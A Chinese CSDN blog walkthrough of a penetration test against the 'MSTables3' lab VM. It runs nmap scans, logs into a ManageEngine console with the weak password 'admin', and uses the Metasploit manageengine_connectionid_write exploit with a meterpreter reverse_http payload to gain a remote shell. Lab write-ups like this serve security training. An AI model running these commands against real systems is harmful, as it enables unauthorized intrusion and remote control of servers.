MSTables3靶机渗透测试(1)- 攻击windows服务器

最新推荐文章于 2024-05-11 11:36:26 发布
最新推荐文章于 2024-05-11 11:36:26 发布
阅读量288 收藏 1
点赞数
文章标签: windows linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53351713/article/details/114142477
版权
  • 链接:https://pan.baidu.com/s/1YNnoVbT-SPmvs3YawJpqjQ
    提取码:nx82
    解压文件后用VMware扫描即可
  • 靶机IP地址为192.168.118.4在这里插入图片描述
    攻击方为Kali Linux
    IP地址:192.168.118.1
    在这里插入图片描述
    1.信息收集
    nmap对其进行扫描
msf6 > db_nmap -sV -A -T4 192.168.118.4

在这里插入图片描述
2.查看可以利用的信息

msf6 > services 192.168.118.4

在这里插入图片描述

  • 接下来再全方位的扫一次(追加所有端口)
msf6 > db_nmap -sV -A -p 1-65535 192.168.118.4

在这里插入图片描述

  • 再次得到信息
    在这里插入图片描述
    3.尝试访问8022端口
    浏览器输入:http://192.168.118.4:8022
    在这里插入图片描述
  • 是一个继承桌面和设备管理软件
  • 使用弱口令admin可登录
    在这里插入图片描述
    4.接下来搜索可用于攻击的模块:manageengine
msf6 > search manageengine

在这里插入图片描述
共找到26个。

  • 使用第25
msf6 > use exploit/windows/http/manageengine_connectionid_write

在这里插入图片描述

  • 设置主机地址:
msf6 exploit(windows/http/manageengine_connectionid_write) > set rhosts 192.168.118.4
rhosts => 192.168.118.4

在这里插入图片描述

  • 再搜索:search reverse_http
msf6 exploit(windows/http/manageengine_connectionid_write) > search reverse_http

在这里插入图片描述

  • 使用第46
msf6 exploit(windows/http/manageengine_connectionid_write) > set payload payload/windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http

在这里插入图片描述

  • 设置端口
msf6 exploit(windows/http/manageengine_connectionid_write) > set rport 8022
rport => 8022

在这里插入图片描述

  • 开始
msf6 exploit(windows/http/manageengine_connectionid_write) > exploit

成功连接!
在这里插入图片描述

  • 输入windows命令ipconfig可查看信息
    在这里插入图片描述
reqian23
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
构建完善的安全渗透测试环境:推荐工具、资源和下载链接
weixin_43263566的博客
02-14 3524
安全渗透环境准备(工具下载)
metasploitable2 渗透测试靶机 1
m0_73910867的博客
10-11 1705
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆 适用于学习网络安全。
最全看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot 1,2024年最新软件测试开发应该了解的Binder原理
最新发布
2401_84563933的博客
05-11 338
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:需要获得root权限找到flagIntermediate(中级的)
DC-9靶机渗透测试
读书 买花 长大
05-21 507
DC-9
看完这篇 教你玩转渗透测试靶机Vulnhub——Hms?1
Aluxian_的博客
11-27 427
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:需要获得root权限找到flagEasy (简单的)1.信息收集工具得使用2.提权命令的使用3.FTP下载、hydra爆破、SSH登入 渗透的流程思路🆗又是收获满满的一天最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
渗透测试 靶机环境下载
zhyuxue的博客
09-09 1276
下载Linux应用程序虚拟机、Windows下载、metasploit下载。
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 Five-3靶机
12-07
Vulnhub靶机渗透测试 Five-3靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
windows渗透测试
Aluxian_的博客
05-25 9034
假设您是一名网络安全工程师,需要对某公司的公司进行黑盒测试,分析windows操作系统有什么漏洞并提出解决方案。 1.通过本地PC中渗透测试平台Kali2.0对服务器场景Windows2020进行系统服务及版本扫描渗透测试,并将该操作显示结果中8080端口对应的服务版本信息字符串作为Flag值提交; 使用nmap -sV -n 靶机IP flag:Microsoft IIS httpd 5.1 1.2. 通过本地PC中渗透测试平台Kali2.0对服务器场景Windows2020进行渗透
基于windows server的简单内网渗透
weixin_55541277的博客
06-09 2257
记录简单的基于windows server搭建的内网渗透靶场
MetaSploit攻击实例讲解------Metasploit自动化攻击(包括kali linux 2016.2(rolling) 和 BT5)...
weixin_34062329的博客
05-20 5389
       不多说,直接上干货!           前期博客 Kali linux 2016.2(Rolling)里Metasploit连接(包括默认和自定义)的PostgreSQL数据库 Kali linux 2016.2(Rolling)里Metasploit连接(包括默认和自定义)的PostgreSQL数据库之后的切换到指定的工作空间 msf > ...
记录一次Vulnerable Odin:1
qq_49186692的博客
01-29 179
一、环境 靶机192.168.21.0网段 Windows 192.168.31.0 kali192.168.21.0 使用VWware安装 值得注意的是,由于靶机中许多许多url使用了odin,没有动态获取,因此需要加一条本地dns 编辑C:\Windows\System32\drivers\etc\hosts 底部添加 IP地址 odin 例如 二、信息收集 1.上nmap扫一波 root@kali:~# nmap -sT 192.168.21.0/24 扫到IP为192.168.21.149 貌
loophole靶机渗透教程
weixin_44058630的博客
01-18 413
loophole靶机教程 1.使用nmap扫描 2.使用searchsploit搜索是否有对应版本信息的漏洞 3.发现符合要求的漏洞利用脚本,将其下载,查看cve号 4.在msf中搜索该cve号,使用对应的攻击模块 4.exploit攻击成功,获取root权限 loophole靶机渗透教程 ...
渗透之路 提权【第二篇】Windows服务器权限分析
dfu65065的博客
09-22 233
windows常见用户 windows2003常见组 windows目录权限 Users的默认权限 windows2003默认权限 木马在不同环境下的运行区别 转载于:https://www.cnblogs.com/hyit/articles/11569058.html...
windows靶机_【内网渗透Windows下的内网传输技术
weixin_39984403的博客
01-26 357
点击上方“公众号” 可以订阅哦!Hello,各位小伙伴大家好~掐指一算,好像已经一个月没更新过了...趁着现在不忙(才不是偷懒)赶紧更新一波~今天给大家分享的内容是Windows内网传输技术:有时候我们拿到一个不能上传shell,但可以命令执行的windows服务器时,可以通过多种方法进行文件上传和下载。一起来看看吧!Part.1FTPFTP环境部署 首先,ftp支持ASCII码传输、也...
靶机渗透测试(SolidState: 1)
@小张小张的博客
11-26 1057
靶机渗透测试(): Vulnhub靶机 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Initial Shell (Easy) - Privileges Escalation (Intermediate)) 目标:Flags: 3 (local.txt, user.txt & root.txt) flag进度:3/3 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令:netdiscove
metasploit靶机渗透测试
08-02
Metasploit靶机是一个用于渗透测试和漏洞利用的虚拟机。您可以通过在VMware虚拟机中安装Metasploitable来搭建一个用于练习渗透攻击的环境。首先,您需要下载Metasploitable虚拟机镜像文件,可以在SourceForge网站上...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值